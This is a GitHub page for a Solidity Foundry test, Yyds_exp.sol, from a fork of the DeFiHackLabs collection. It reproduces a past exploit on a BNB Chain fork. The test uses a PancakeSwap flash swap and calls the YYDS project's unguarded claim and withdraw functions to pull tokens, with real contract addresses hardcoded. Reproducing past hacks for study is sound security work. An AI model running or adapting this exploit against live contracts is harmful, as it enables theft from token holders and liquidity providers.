forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 1
/
Yyds_exp.sol
85 lines (67 loc) · 2.67 KB
/
Yyds_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
interface TargetClaim {
function claim(address) external;
}
interface TargetWithdraw {
function withdrawReturnAmountByMerchant() external ;
function withdrawReturnAmountByConsumer() external ;
function withdrawReturnAmountByReferral() external ;
}
contract ContractTest is DSTest{
IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
IERC20 YYDS = IERC20(0xB19463ad610ea472a886d77a8ca4b983E4fAf245);
Uni_Pair_V2 Pair = Uni_Pair_V2(0xd5cA448b06F8eb5acC6921502e33912FA3D63b12);
TargetClaim targetClaim = TargetClaim(0xe70cdd37667cdDF52CabF3EdabE377C58FaE99e9);
TargetWithdraw targetWihtdraw = TargetWithdraw(0x970A76aEa6a0D531096b566340C0de9B027dd39D);
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
uint256 reserve0;
uint256 reserve1;
function setUp() public {
cheats.createSelectFork("bsc", 21157025);
}
function testExploit() public {
emit log_named_decimal_uint(
"[Start] Attacker USDT balance before exploit",
USDT.balanceOf(address(this)),
18
);
(reserve0, reserve1, ) = Pair.getReserves();
uint256 amount0Out = USDT.balanceOf(address(Pair));
Pair.swap(amount0Out - 1 * 1e18, 0, address(this), new bytes(1));
emit log_named_decimal_uint(
"[End] Attacker USDT balance after exploit",
USDT.balanceOf(address(this)),
18
);
}
function pancakeCall(address sender, uint amount0, uint amount1, bytes calldata data) public{
emit log_named_decimal_uint(
"Attacker YYDS balance before exploit",
YYDS.balanceOf(address(this)),
18
);
targetClaim.claim(address(this));
try targetWihtdraw.withdrawReturnAmountByReferral(){
} catch{
}
try targetWihtdraw.withdrawReturnAmountByMerchant(){
} catch{
}
try targetWihtdraw.withdrawReturnAmountByConsumer(){
} catch{
}
emit log_named_decimal_uint(
"Attacker YYDS balance after exploit",
YYDS.balanceOf(address(this)),
18
);
uint256 yydsInContract = YYDS.balanceOf(address(this));
YYDS.transfer(address(Pair), yydsInContract);
uint256 yydsInPair = YYDS.balanceOf(address(Pair));
uint256 amountUsdt = (reserve0 * reserve1 / ((yydsInPair * 10000 - yydsInContract * 25)/10000)) /9975*10000;
USDT.transfer(address(Pair), amountUsdt);
}
}